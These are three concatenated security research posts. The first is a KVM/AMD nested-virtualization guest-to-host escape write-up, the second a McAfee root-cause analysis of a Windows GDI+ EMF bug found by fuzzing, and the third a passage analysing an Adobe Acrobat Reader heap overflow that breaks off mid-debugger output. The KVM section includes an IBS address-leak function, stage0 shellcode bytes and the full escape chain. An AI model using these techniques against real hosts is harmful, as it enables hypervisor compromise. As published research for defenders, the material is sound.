If VMRUN succeeds, try to launch a “L3” guest using another invocation of VMRUN. If this fails, we have lost the race in step 2 and must try again. If VMRUN succeeds we have successfully overwritten svm->nested.hsave with our L2 context.
Clear the SVME bit in MSR_EFER while still running in the “L3” context. This frees the MSR permission bitmap backing pages used by the L2 guest who is now executing again.
Wait until the KVM host reuses the backing pages. This will potentially clear all or some of the bits, giving the guest access to host MSRs.

When I initially discovered and reported this vulnerability, I was feeling pretty confident that this type of MSR access should be more or less equivalent to full code execution on the host. While my feeling turned out to be correct, getting there still took me multiple weeks of exploit development. In the next section I’ll describe the steps to turn this primitive into a guest-to-host escape.

The Exploit

Assuming our guest can get full unrestricted access to any MSR (which is only a question of timing thanks to init_on_alloc=1 being the default for most modern distributions), how can we escalate this into running arbitrary code in the context of the KVM host? To answer this question we first need to look at what kind of MSRs are supported on a modern AMD system. Looking at the BIOS and Kernel Developer’s Guide for recent AMD processors we can find a wide range of MSRs starting with well known and widely used ones such as EFER (the Extended Feature Enable Register) or LSTAR (the syscall target address) to rarely used ones like SMI_ON_IO_TRAP (can be used to generate a System Management Mode Interrupt when specific IO port ranges are accessed).

Looking at the list, several registers like LSTAR or KERNEL_GSBASE seem like interesting targets for redirecting the execution of the host kernel. Unrestricted access to these registers is actually enabled by default, however they are automatically restored to a valid state by KVM after a vmexit so modifying them does not lead to any changes in host behavior.

Still, there is one MSR that we previously mentioned and that seems to give us a straightforward way to achieve code execution: The VM_HSAVE_PA that stores the physical address of the host save area, which is used to restore the host context when a vmexit occurs. If we can point this MSR at a memory location under our control we should be able to fake a malicious host context and execute our own code after a vmexit.

While this sounds pretty straightforward in theory, implementing it still has some challenges:

AMD is pretty clear about the fact that software should not touch the host save area in any way and that the data stored in this area is CPU-dependent: “Processor implementations may store only part or none of host state in the memory area pointed to by VM_HSAVE_PA MSR and may store some or all host state in hidden on-chip memory. Different implementations may choose to save the hidden parts of the host’s segment registers as well as the selectors. For these reasons, software must not rely on the format or contents of the host state save area, nor attempt to change host state by modifying the contents of the host save area.” (AMD64 Architecture Programmer’s Manual, Volume 2: System Programming, Page 477). To strengthen the point, the format of the host save area is undocumented.
Debugging issues involving an invalid host state is very tedious as any issue leads to an immediate processor shutdown. Even worse, I wasn’t sure if rewriting the VM_HSAVE_PA MSR while running inside a VM can even work. It’s not really something that should happen during normal operation so in the worst case scenario, overwriting the MSR would just lead to an immediate crash.
Even if we can create a valid (but malicious) host save area in our guest, we still need some way to identify its host physical address (HPA). Because our guest runs with nested paging enabled, physical addresses that we can see in the guest (GPAs) are still one address translation away from their HPA equivalent.

After spending some time scrolling through AMD’s documentation, I still decided that VM_HSAVE_PA seems to be the best way forward and decided to tackle these problems one by one.

After dumping the host save area of a normal KVM guest running on an AMD EPYC 7351P CPU, the first problem goes away quickly: As it turns out, the host save area has the same layout as a normal VMCB with only a couple of relevant fields initialized. Even better, the initialized fields include all the saved host information documented in the AMD manual so the fear that all interesting host state is stored in on-chip memory seems to be unfounded.

Saving Host State. To ensure that the host can resume operation after #VMEXIT, VMRUN saves at least the following host state information:

CS.SEL, NEXT_RIP—The CS selector and rIP of the instruction following the VMRUN. On #VMEXIT the host resumes running at this address.
RFLAGS, RAX—Host processor mode and the register used by VMRUN to address the VMCB.
SS.SEL, RSP—Stack pointer for host
CRO, CR3, CR4, EFER—Paging/operating mode for host
IDTR, GDTR—The pseudo-descriptors. VMRUN does not save or restore the host LDTR.
ES.SEL and DS.SEL.

Under the mistaken assumption that I solved the problem of creating a fake but valid host save area, I decided to look into building an infoleak that gives me the ability to translate GPAs to HPAs. A couple hours of manual reading led me to an AMD-specific performance monitoring feature called Instruction Based Sampling (IBS). When IBS is enabled by writing the right magic invocation to a set of MSRs, it samples every Nth instruction that is executed and collects a wide range of information about the instruction. This information is logged in another set of MSRs and can be used to analyze the performance of any piece of code running on the CPU. While most of the documentation for IBS is pretty sparse or hard to follow, the very useful open source project AMD IBS Toolkit contains working code, a readable high level description of IBS and a lot of useful references.

IBS supports two different modes of operation, one that samples Instruction fetches and one that samples micro-ops (which you can think of as the internal RISC representation of more complex x64 instructions). Depending on the operation mode, different data is collected. Besides a lot of caching and latency information that we don’t care about, fetch sampling also returns the virtual address and physical address of the fetched instruction. Op sampling is even more useful as it returns the virtual address of the underlying instruction as well as virtual and physical addresses accessed by any load or store micro op.

Interestingly, IBS does not seem to care about the virtualization context of its user and every physical address returned by it is an HPA (of course this is not a problem outside of this exploit as guest accesses to the IBS MSR’s will normally be restricted). The wide range of data returned by IBS and the fact that it’s completely driven by MSR reads and writes make it the perfect tool for building infoleaks for our exploit.

Building a GPA -> HPA leak boils down to enabling IBS ops sampling, executing a lot of instructions that access a specific memory page in our VM and reading the IBS_DC_PHYS_AD MSR to find out its HPA:

// This function leaks the HPA of a guest page using

// AMD's Instruction Based Sampling. We try to sample

// one of our memory loads/writes to *p, which will

// store the physical memory address in MSR_IBC_DH_PHYS_AD

static u64 leak_guest_hpa(u8 *p) {

volatile u8 *ptr = p;

u64 ibs = scatter_bits(0x2, IBS_OP_CUR_CNT_23) |

scatter_bits(0x10, IBS_OP_MAX_CNT) | IBS_OP_EN;

while (true) {

wrmsr(MSR_IBS_OP_CTL, ibs);

u64 x = 0;

for (int i = 0; i < 0x1000; i++) {

x = ptr[i];

ptr[i] += ptr[i - 1];

ptr[i] = x;

if (i % 50 == 0) {

u64 valid = rdmsr(MSR_IBS_OP_CTL) & IBS_OP_VAL;

if (valid) {

u64 op3 = rdmsr(MSR_IBS_OP_DATA3);

if ((op3 & IBS_ST_OP) || (op3 & IBS_LD_OP)) {

if (op3 & IBS_DC_PHY_ADDR_VALID) {

printf("[x] leak_guest_hpa: %lx %lx %lx\n", rdmsr(MSR_IBS_OP_RIP),

rdmsr(MSR_IBS_DC_PHYS_AD), rdmsr(MSR_IBS_DC_LIN_AD));

return rdmsr(MSR_IBS_DC_PHYS_AD) & ~(0xFFF);

}

wrmsr(MSR_IBS_OP_CTL, ibs);

}

wrmsr(MSR_IBS_OP_CTL, ibs & ~IBS_OP_EN);

}

Using this infoleak primitive, I started to create a fake host save area by preparing my own page tables (for pointing CR3 at them), interrupt descriptor tables and segment descriptors and pointing RIP to a primitive shellcode that would write to the serial console. Of course, my first tries immediately crashed the whole system and even after spending multiple days to make sure everything was set up correctly, the system would crash immediately once I pointed the hsave MSR at my own location.

After getting frustrated with the total lack of progress, watching my server reboot for the hundredth time, trying to come up with a different exploitation strategy for two weeks and learning about the surprising regularity of physical page migrations on Linux, I realized that I made an important mistake. Just because the CPU initializes all the expected fields in the host save area, it is not safe to assume that these fields are actually used for restoring the host context. Slow trial and error led to the discovery that my AMD EPYC CPU ignores everything in the host save area besides the values of the RIP, RSP and RAX registers.

While this register control would make a local privilege escalation straightforward, escaping the VM boundary is a bit more complicated. RIP and RSP control make launching a kernel ROP chain the next logical step, but this requires us to first break the host kernel's address randomization and to find a way to store controlled data at a known host virtual address (HVA).

Fortunately, we have IBS as a powerful infoleak building primitive and can use it to gather all required information in a single run:

Leaking the host kernel's (or more specifically kvm-amd.ko’s) base address can be done by enabling IBS sampling with a small sampling interval and immediately triggering a VM exit. When VM execution continues, the IBS result MSRs will contain the HVA of instructions executed by KVM during the exit handling.
The most powerful way to store data at a known HVA is to leak the location of the kernel’s linear mapping (also known as physmap), a 1:1 mapping of all physical pages on the system. This gives us a GPA->HVA translation primitive by first using our GPA->HPA infoleak from above and then adding the HPA to the physmap base address. Leaking the physmap is possible by sampling micro ops in the host kernel until we find a read or write operation, where the lower ~30 bits of the accessed virtual address and physical address are identical.

Having all these building blocks in place, we could now try to build a kernel ROP chain that executes some interesting payload. However, there is one important caveat. When we take over execution after a vmexit, the system is still in a somewhat unstable state. As mentioned above, SVM’s context switching is very minimal and we are at least one VMLOAD instruction and reenabling of interrupts away from a usable system. While it is surely possible to exploit this bug and to restore the original host context using a sufficiently complex ROP chain, I decided to find a way to run my own code instead.

A couple of years ago, the Linux physmap was still mapped executable and executing our own code would be as simple as jumping to a physmap mapping of one of our guest pages. Of course, that is not possible anymore and the kernel tries hard to not have any memory pages mapped as writable and executable. Still, page protections only apply to virtual memory accesses so why not use an instruction that directly writes controlled data to a physical address? As you might remember from our initial discussion of SVM earlier in this chapter, SVM supports an instruction called VMSAVE to store hidden guest state (or host state) in a VMCB. Similar to VMRUN, VMSAVE takes a physical address to a VMCB stored in the RAX register as an implicit argument. It then writes the following register state to the VMCB:

FS, GS, TR, LDTR
KernelGsBase
STAR, LSTAR, CSTAR, SFMASK
SYSENTER_CS, SYSENTER_ESP, SYSENTER_EIP

For us, VMSAVE is interesting for a couple of reasons:

It is used as part of KVM’s normal SVM exit handler and can be easily integrated into a minimal ROP chain.
It operates on physical addresses, so we can use it to write to an arbitrary memory location including KVM’s own code.
All written registers still contain the guest values set by our VM, allowing us to control the written content with some restrictions

VMSAVE’s biggest downside as an exploitation primitive is that RAX needs to be page aligned, reducing our control of the target address. VMSAVE writes to the memory offsets 0x440-0x480 and 0x600-0x638 so we need to be careful about not corrupting any memory that’s in use.

In our case this turns out to be a non-issue, as KVM contains a couple of code pages where functions that are rarely or never used (e.g cleanup_module or SEV specific code) are stored at these offsets.

While we don’t have full control over the written data and valid register values are somewhat restricted, it is still possible to write a minimal stage0 shellcode to an arbitrary page in the host kernel by filling guest MSRs with the right values. My exploit uses the STAR, LSTAR and CSTAR registers for this which are written to the physical offsets 0x400, 0x408 and 0x410. As all three registers need to contain canonical addresses, we can only use parts of the registers for our shellcode and use relative jumps to skip the unusable parts of the STAR and LSTAR MSRs:

// mov cr0, rbx; jmp

wrmsr(MSR_STAR, 0x00000003ebc3220f);

// pop rdi; pop rsi; pop rcx; jmp

wrmsr(MSR_LSTAR, 0x00000003eb595e5fULL);

// rep movsb; pop rdi; jmp rdi;

wrmsr(MSR_CSTAR, 0xe7ff5fa4f3);

The above code makes use of the fact that we control the value of the RBX register and the stack when we return to it as part of our initial ROP chain. First, we copy the value of RBX (0x80040033) into CR0, which disables Write Protection (WP) for kernel memory accesses. This makes all of the kernel code writable on this CPU allowing us to copy a larger stage1 shellcode to an arbitrary unused memory location and jump to it.

Once the WP bit in cr0 is disabled and the stage1 payload executes, we have a wide range of options. For my proof-of-concept exploit I decided on a somewhat boring but easy-to-implement approach to spawn a random user space command: The host is still in a very weird state so our stage1 payload can’t directly call into other kernel functions, but we can easily backdoor a function pointer which will be called at some later point in time. KVM uses the kernel’s global workqueue feature to regularly synchronize a VM’s clock between different vCPUs. The function pointer responsible for this work is stored in the (per VM) kvm->arch data structure as kvm->arch.kvmclock_update_work. The stage1 payload overrides this function pointer with the address of a stage2 payload. To put the host into a usable state it then sets the VM_HSAVE_PA MSR back to its original value and restores RSP and RIP to call the original vmexit handler.

The final stage2 payload executes at some later point in time as part of the kernel global work queue and uses the call_usermodehelper to run an arbitrary command with root privileges.

Let’s put all of this together and walk through the attacks step-by-step:

Prepare the stage0 payload by splitting it up and setting the right guest MSRs.
Trigger the TOCTOU vulnerability in nested_svm_vmrun and free the MSR permission bitmap by disabling the SVME bit in the EFER MSR.
Wait for the pages to be reused and initialized to 0 to get unrestricted MSR access.
Prepare a fake host save area, a stack for the initial ROP chain and a staging memory area for the stage1 and stage2 payloads.
Leak the HPA of the host save area, the HVA addresses of the stack and staging page and the kvm-amd.ko’s base address using the different IBS infoleaks.
Redirect execution to the VMSAVE gadget by setting RIP, RSP and RAX in the fake host save area, pointing the VM_HSAVE_PA MSR at it and triggering a VM exit.
VMSAVE writes the stage0 payload to an unused offset in kvm-amd’s code segment, when the gadget returns stage0 gets executed.
stage0 disables Write Protection in CR0 and overwrites an unused executable memory location with the stage1 and stage2 payloads, before jumping to stage1.
stage1 overwrites kvm->arch.kvmclock_update_work.work.func with a pointer to stage2 before restoring the original host context.
At some later point in time kvm->arch.kvmclock_update_work.work.func is called as part of the global kernel work_queue and stage2 spawns an arbitrary command using call_usermodehelper.

Interested readers should take a look at the heavily documented proof-of-concept exploit for the actual implementation.

Conclusion

This blog post describes a KVM-only VM escape made possible by a small bug in KVM’s AMD-specific code for supporting nested virtualization. Luckily, the feature that made this bug exploitable was only included in two kernel versions (v5.10, v5.11) before the issue was spotted, reducing the real-life impact of the vulnerability to a minimum. The bug and its exploit still serve as a demonstration that highly exploitable security vulnerabilities can still exist in the very core of a virtualization engine, which is almost certainly a small and well audited codebase. While the attack surface of a hypervisor such as KVM is relatively small from a pure LoC perspective, its low level nature, close interaction with hardware and pure complexity makes it very hard to avoid security-critical bugs.

While we have not seen any in-the-wild exploits targeting hypervisors outside of competitions like Pwn2Own, these capabilities are clearly achievable for a well-financed adversary. I’ve spent around two months on this research, working as an individual with only remote access to an AMD system. Looking at the potential ROI on an exploit like this, it seems safe to assume that more people are working on similar issues right now and that vulnerabilities in KVM, Hyper-V, Xen or VMware will be exploited in-the-wild sooner or later.

What can we do about this? Security engineers working on Virtualization Security should push for as much attack surface reduction as possible. Moving complex functionality to memory-safe user space components is a big win even if it does not help against bugs like the one described above. Disabling unneeded or unreviewed features and performing regular in-depth code reviews for new changes can further reduce the risk of bugs slipping by.

Hosters, cloud providers and other enterprises that are relying on virtualization for multi-tenancy isolation should design their architecture in way that limits the impact of an attacker with an VM escape exploit:

Isolation of VM hosts: Machines that host untrusted VMs should be considered at least partially untrusted. While a VM escape can give an attacker full control over a single host, it should not be easily possible to move from one compromised host to another. This requires that the control plane and backend infrastructure is sufficiently hardened and that user resources like disk images or encryption keys are only exposed to hosts that need them. One way to limit the impact of a VM escape even further is to only run VMs of a specific customer or of a certain sensitivity on a single machine.
Investing in detection capabilities: In most architectures, the behavior of a VM host should be very predictable, making a compromised host stick out quickly once an attacker tries to move to other systems. While it’s very hard to rule out the possibility of a vulnerability in your virtualization stack, good detection capabilities make life for an attacker much harder and increase the risk of quickly burning a high-value vulnerability. Agents running on the VM host can be a first (but bypassable) detection mechanism, but the focus should be on detecting unusual network communication and resource accesses.

McAfee Blogs
Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+Hardik Shah
28 June 2021 at 19:44

Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+

McAfee Blogs

By: Hardik Shah

28 June 2021 at 19:44

Introduction

Microsoft Windows Graphics Device Interface+, also known as GDI+, allows various applications to use different graphics functionality on video displays as well as printers. Windows applications don’t directly access graphics hardware such as device drivers, but they interact with GDI, which in turn then interacts with device drivers. In this way, there is an abstraction layer to Windows applications and a common set of APIs for everyone to use.

Because of its complex format, GDI+ has a known history of various vulnerabilities. We at McAfee continuously fuzz various open source and closed source software including windows GDI+. Over the last few years, we have reported various issues to Microsoft in various Windows components including GDI+ and have received CVEs for them.

In this post, we detail our root cause analysis of one such vulnerability which we found using WinAFL: CVE-2021-1665 – GDI+ Remote Code Execution Vulnerability. This issue was fixed in January 2021 as part of a Microsoft Patch.

What is WinAFL?

WinAFL is a Windows port of a popular Linux AFL fuzzer and is maintained by Ivan Fratric of Google Project Zero. WinAFL uses dynamic binary instrumentation using DynamoRIO and it requires a program called as a harness. A harness is nothing but a simple program which calls the APIs we want to fuzz.

A simple harness for this was already provided with WinAFL, we can enable “Image->GetThumbnailImage” code which was commented by default in the code. Following is the harness code to fuzz GDI+ image and GetThumbnailImage API:

As you can see, this small piece of code simply creates a new image object from the provided input file and then calls another function to generate a thumbnail image. This makes for an excellent attack vector and can affect various Windows applications if they use thumbnail images. In addition, this requires little user interaction, thus software which uses GDI+ and calls GetThumbnailImage API, is vulnerable.

Collecting Corpus:

A good corpus provides a sound foundation for fuzzing. For that we can use Google or GitHub in addition to further test corpus available from various software and public EMF files which were released for other vulnerabilities. We have generated a few test files by making changes to a sample code provided on Microsoft’s site which generates an EMF file with EMFPlusDrawString and other records:

Ref: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emfplus/07bda2af-7a5d-4c0b-b996-30326a41fa57

Minimizing Corpus:

After we have collected an initial corpus file, we need to minimize it. For this we can use a utility called winafl-cmin.py as follows:

winafl-cmin.py -D D:\\work\\winafl\\DynamoRIO\\bin32 -t 10000 -i inCorpus -o minCorpus -covtype edge -coverage_module gdiplus.dll -target_module gdiplus_hardik.exe -target_method fuzzMe -nargs 2 — gdiplus_hardik.exe @@

How does WinAFL work?

WinAFL uses the concept of in-memory fuzzing. We need to provide a function name to WinAFL. It will save the program state at the start of the function and take one input file from the corpus, mutate it, and feed it to the function.

It will monitor this for any new code paths or crashes. If it finds a new code path, it will consider the new file as an interesting test case and will add it to the queue for further mutation. If it finds any crashes, it will save the crashing file in crashes folder.

The following picture shows the fuzzing flow:

Fuzzing with WinAFL:

Once we have compiled our harness program, collected, and minimized the corpus, we can run this command to fuzz our program with WinAFL:

afl-fuzz.exe -i minCorpus -o out -D D:\work\winafl\DynamoRIO\bin32 -t 20000 —coverage_module gdiplus.dll -fuzz_iterations 5000 -target_module gdiplus_hardik.exe -target_offset 0x16e0 -nargs 2 — gdiplus_hardik.exe @@

Results:

We found a few crashes and after triaging unique crashes, and we found a crash in “gdiplus!BuiltLine::GetBaselineOffset” which looks as follows in the call stack below:

As can be seen in the above image, the program is crashing while trying to read data from a memory address pointed by edx+8. We can see it registers ebx, ecx and edx contains c0c0c0c0 which means that page heap is enabled for the binary. We can also see that c0c0c0c0 is being passed as a parameter to “gdiplus!FullTextImager::RenderLine” function.

Patch Diffing to See If We Can Find the Root Cause

To figure out a root cause, we can use patch diffing—namely, we can use IDA BinDiff plugin to identify what changes have been made to patched file. If we are lucky, we can easily find the root cause by just looking at the code that was changed. So, we can generate an IDB file of patched and unpatched versions of gdiplus.dll and then run IDA BinDiff plugin to see the changes.

We can see that one new function was added in the patched file, and this seems to be a destructor for BuiltLine Object :

We can also see that there are a few functions where the similarity score is < 1 and one such function is FullTextImager::BuildAllLines as shown below:

Now, just to confirm if this function is really the one which was patched, we can run our test program and POC in windbg and set a break point on this function. We can see that the breakpoint is hit and the program doesn’t crash anymore:

Now, as a next step, we need to identify what has been changed in this function to fix this vulnerability. For that we can check flow graph of this function and we see something as follows. Unfortunately, there are too many changes to identify the vulnerability by simply looking at the diff:

The left side illustrates an unpatched dll while right side shows a patched dll:

Green indicates that the patched and unpatched blocks are same.
Yellow blocks indicate there has been some changes between unpatched and patched dlls.
Red blocks call out differences in the dlls.

If we zoom in on the yellow blocks we can see following:

We can note several changes. Few blocks are removed in the patched DLL, so patch diffing will alone will not be sufficient to identify the root cause of this issue. However, this presents valuable hints about where to look and what to look for when using other methods for debugging such as windbg. A few observations we can spot from the bindiff output above:

In the unpatched DLL, if we check carefully we can see that there is a call to “GetuntrimmedCharacterCount” function and later on there is another call to a function “SetSpan::SpanVector”
In the patched DLL, we can see that there is a call to “GetuntrimmedCharacterCount” where a return value stored inside EAX register is checked. If it’s zero, then control jumps to another location—a destructor for BuiltLine Object, this was newly added code in the patched DLL:

So we can assume that this is where the vulnerability is fixed. Now we need to figure out following:

Why our program is crashing with the provided POC file?
What field in the file is causing this crash?
What value of the field?
Which condition in program which is causing this crash?
How this was fixed?

EMF File Format:

EMF is also known as enhanced meta file format which is used to store graphical images device independently. An EMF file is consisting of various records which is of variable length. It can contain definition of various graphic object, commands for drawing and other graphics properties.

Credit: MS EMF documentation.

Generally, an EMF file consist of the following records:

EMF Header – This contains information about EMF structure.
EMF Records – This can be various variable length records, containing information about graphics properties, drawing order, and so forth.
EMF EOF Record – This is the last record in EMF file.

Detailed specifications of EMF file format can be seen at Microsoft site at following URL:

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emf/91c257d7-c39d-4a36-9b1f-63e3f73d30ca

Locating the Vulnerable Record in the EMF File:

Generally, most of the issues in EMF are because of malformed or corrupt records. We need to figure out which record type is causing this crash. For this if we look at the call stack we can see following:

We can notice a call to function “gdiplus!GdipPlayMetafileRecordCallback”

By setting a breakpoint on this function and checking parameter, we can see following:

We can see that EDX contains some memory address and we can see that parameter given to this function are: 00x00401c,0x00000000 and 0x00000044.

Also, on checking the location pointed by EDX we can see following:

If we check our POC EMF file, we can see that this data belongs to file from offset: 0x15c:

By going through EMF specification and manually parsing the records, we can easily figure out that this is a “EmfPlusDrawString” record, the format of which is shown below:

In our case:

Record Type = 0x401c EmfPlusDrawString record

Flags = 0x0000

Size = 0x50

Data size = 0x44

Brushid = 0x02

Format id = 0x01

Length = 0x14

Layoutrect = 00 00 00 00 00 00 00 00 FC FF C7 42 00 00 80 FF

String data =

Now that we have located the record that seems to be causing the crash, the next thing is to figure out why our program is crashing. If we debug and check the code, we can see that control reaches to a function “gdiplus!FullTextImager::BuildAllLines”. When we decompile this code, we can see something like this:

The following diagram shows the function call hierarchy:

The execution flow in summary:

Inside “Builtline::BuildAllLines” function, there is a while loop inside which the program allocates 0x60 bytes of memory. Then it calls the “Builtline::BuiltLine”
The “Builtline::BuiltLine” function moves data to the newly allocated memory and then it calls “BuiltLine::GetUntrimmedCharacterCount”.
The return value of “BuiltLine::GetUntrimmedCharacterCount” is added to loop counter, which is ECX. This process will be repeated until the loop counter (ECX) is < string length(EAX), which is 0x14 here.
The loop starts from 0, so it should terminate at 0x13 or it should terminate when the return value of “GetUntrimmedCharacterCount” is 0.
But in the vulnerable DLL, the program doesn’t terminate because of the way loop counter is increased. Here, “BuiltLine::GetUntrimmedCharacterCount” returns 0, which is added to Loop counter(ECX) and doesn’t increase ECX value. It allocates 0x60 bytes of memory and creates another line, corrupting the data that later leads the program to crash. The loop is executed for 21 times instead of 20.

In detail:

1. Inside “Builtline::BuildAllLines” memory will be allocated for 0x60 or 96 bytes, and in the debugger it looks as follows:

2. Then it calls “BuiltLine::BuiltLine” function and moves the data to newly allocated memory:

3. This happens in side a while loop and there is a function call to “BuiltLine::GetUntrimmedCharacterCount”.

4. Return value of “BuiltLine::GetUntrimmedCharacterCount” is stored in a location 0x12ff2ec. This value will be 1 as can be seen below:

5. This value gets added to ECX:

6. Then there is a check that determines if ecx< eax. If true, it will continue loop, else it will jump to another location:

7. Now in the vulnerable version, loop doesn’t exist if the return value of “BuiltLine::GetUntrimmedCharacterCount” is 0, which means that this 0 will be added to ECX and which means ECX will not increase. So the loop will execute 1 more time with the “ECX” value of 0x13. Thus, this will lead to loop getting executed 21 times rather than 20 times. This is the root cause of the problem here.

Also after some debugging, we can figure out why EAX contains 14. It is read from the POC file at offset: 0x174:

If we recall, this is the EmfPlusDrawString record and 0x14 is the length we mentioned before.

Later on, the program reaches to “FullTextImager::Render” function corrupting the value of EAX because it reads the unused memory:

This will be passed as an argument to “FullTextImager::RenderLine” function:

Later, program will crash while trying to access this location.

Our program was crashing while processing EmfPlusDrawString record inside the EMF file while accessing an invalid memory location and processing string data field. Basically, the program was not verifying the return value of “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function and this resulted in taking a different program path that corrupted the register and various memory values, ultimately causing the crash.

How this issue was fixed?

As we have figured out by looking at patch diff above, a check was added which determined the return value of “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function.

If the retuned value is 0, then program xor’s EBX which contains counter and jump to a location which calls destructor for Builtline Object:

Here is the destructor that prevents the issue:

Conclusion:

GDI+ is a very commonly used Windows component, and a vulnerability like this can affect billions of systems across the globe. We recommend our users to apply proper updates and keep their Windows deployment current.

We at McAfee are continuously fuzzing various open source and closed source library and work with vendors to fix such issues by responsibly disclosing such issues to them giving them proper time to fix the issue and release updates as needed.

We are thankful to Microsoft for working with us on fixing this issue and releasing an update.

The post Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+ appeared first on McAfee Blog.

Exodus Intelligence
Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DCExodus Intel VRT
28 June 2021 at 10:46

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

Exodus Intelligence

By: Exodus Intel VRT

28 June 2021 at 10:46

By Sergi Martinez

This post analyzes and exploits CVE-2021-21017, a heap buffer overflow reported in Adobe Acrobat Reader DC prior to versions 2021.001.20135. This vulnerability was anonymously reported to Adobe and patched on February 9th, 2021. A publicly posted proof-of-concept containing root-cause analysis was used as a starting point for this research.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer-overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module that deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL of a different encoding to the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in the copying twice the number of bytes of the source ANSI string (relative URL) into a properly-sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-21017

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  CHAR v6; // cl
  CHAR *v7; // ecx
  CHAR v8; // al
  CHAR v9; // dl
  CHAR *v10; // eax
  bool v11; // zf
  CHAR *v12; // eax

[Truncated]

  int iMaxLength; // [esp+D4h] [ebp-14h]
  LPCSTR v65; // [esp+D8h] [ebp-10h]
  int v66; // [esp+DCh] [ebp-Ch] BYREF
  LPCSTR v67; // [esp+E0h] [ebp-8h]
  wchar_t *v68; // [esp+E4h] [ebp-4h]

  v68 = 0;
  v65 = 0;
  v67 = 0;
  v38 = 0;
  v51 = 0;
  v63 = 0;
  v5 = 1;
  if ( !a5 )
    return 0;
  *a5 = 0;
  if ( lpString )
  {
    if ( *lpString )
    {
      v6 = lpString[1];
      if ( v6 )
      {

[1]

        if ( *lpString == (CHAR)0xFE && v6 == (CHAR)0xFF )
        {
          v7 = lpString;
          while ( 1 )
          {
            v8 = *v7;
            v9 = v7[1];
            v7 += 2;
            if ( !v8 )
              break;
            if ( !v9 || !v7 )
              goto LABEL_14;
          }
          if ( !v9 )
            goto LABEL_15;

[2]

LABEL_14:
          *a5 = -2;
          return 0;
        }
      }
    }
  }
LABEL_15:
  if ( !Source || !lpString || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_79;
  }

[3]

  iMaxLength = sub_25802A44((LPCSTR)Source) + 1;
  v10 = (CHAR *)sub_25802CD5(1, iMaxLength);
  v65 = v10;
  if ( !v10 )
  {
    *a5 = -7;
    return 0;
  }

[4]

  sub_25802D98((wchar_t *)v10, Source, iMaxLength);
  if ( *lpString != (CHAR)0xFE || (v11 = lpString[1] == -1, v67 = (LPCSTR)2, !v11) )
    v67 = (LPCSTR)1;

[5]

  v66 = (int)&v67[sub_25802A44(lpString)];
  v12 = (CHAR *)sub_25802CD5(1, v66);
  v67 = v12;
  if ( !v12 )
  {
    *a5 = -7;
LABEL_79:
    v5 = 0;
    goto LABEL_80;
  }

[6]

  sub_25802D98((wchar_t *)v12, (wchar_t *)lpString, v66);
  if ( !(unsigned __int16)sub_258033CD(v65, iMaxLength, a5) || !(unsigned __int16)sub_258033CD(v67, v66, a5) )
    goto LABEL_79;

[7]

  v13 = sub_25802400(v65, v31);
  if ( v13 || (v13 = sub_25802400(v67, v39)) != 0 )
  {
    *a5 = v13;
    goto LABEL_79;
  }

[Truncated]

[8]

  v23 = (wchar_t *)sub_25802CD5(1, v47 + 1 + v35);
  v68 = v23;
  if ( v23 )
  {
    if ( v35 )
    {

[9]

      sub_25802D98(v23, v36, v35 + 1);
      if ( *((_BYTE *)v23 + v35 - 1) != 47 )
      {
        v25 = sub_25818CE4(v24, (char *)v23, 47);
        if ( v25 )
          *(_BYTE *)(v25 + 1) = 0;
        else
          *(_BYTE *)v23 = 0;
      }
    }
    if ( v47 )
    {

[10]

      v26 = sub_25802A44((LPCSTR)v23);
      sub_25818BE0((char *)v23, v48, v47 + 1 + v26);
    }
    sub_25802E0C(v23, 0);
    v60 = sub_25802A44((LPCSTR)v23);
    v61 = v23;
    goto LABEL_69;
  }
  v5 = 0;
  *a4 = v47 + v35 + 1;
  *a5 = -3;
LABEL_81:
  if ( v65 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v65);
  if ( v67 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v67);
  if ( v23 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824088 + 12))(v23);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
605a7d70 55              push    ebp
0:000> dd poi(esp+4) L84
